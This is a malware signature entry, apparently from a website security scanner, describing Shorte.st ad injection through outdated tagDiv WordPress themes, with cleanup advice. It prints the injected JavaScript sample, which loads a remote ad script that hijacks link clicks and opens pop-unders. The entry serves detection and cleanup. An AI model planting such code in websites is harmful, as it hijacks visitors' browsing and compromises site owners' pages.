SiteCheck Signatures

  1. Home
  2. SiteCheck Signatures
  3. malware.shorte_st_injection

malware.shorte_st_injection

Description:
Injected unwanted Shorte.st ads, that hijack link click. The Shorte.st script is injected via a vulnerability in outdated tagDiv themes: Nespapere and Newsmag (and their derivatives).

Malware sample:

//<![CDATA[
(function() {
    var configuration = {
    "token": "8f1bc5aa7e697f9829c057cfd305bd64",
    "exitScript": {
        "enabled": true
    },
    "popUnder": {
        "enabled": true
    }
};
    var script = document.createElement('​script');
    script.async = true;
    script.src = '//cdn.​shorte[.]st/link-converter.min.js';
    script.onload = script.​onreadystatechange = function () {var rs = this.readyState; if (rs && rs != 'complete' && rs != 'loaded') return; shortestMonetization(​configuration);};
    var entry = document.getElementsByTagName('​script')[​0];
    entry.parentNode.insertBefore(​script, entry);
})();
//]]>

Affecting: WordPress sites with outdated tagDiv themes such as Newspapaper and Newsmag.

Cleanup: Remove the injected code from the Ads/Header Ad section of the theme settings in WordPress admin interface. Update the theme or switch to a more secure theme.

More Information: Unwanted “Shorte St” Ads in Unpatched Newspaper Theme
How to clean a hacked WordPress site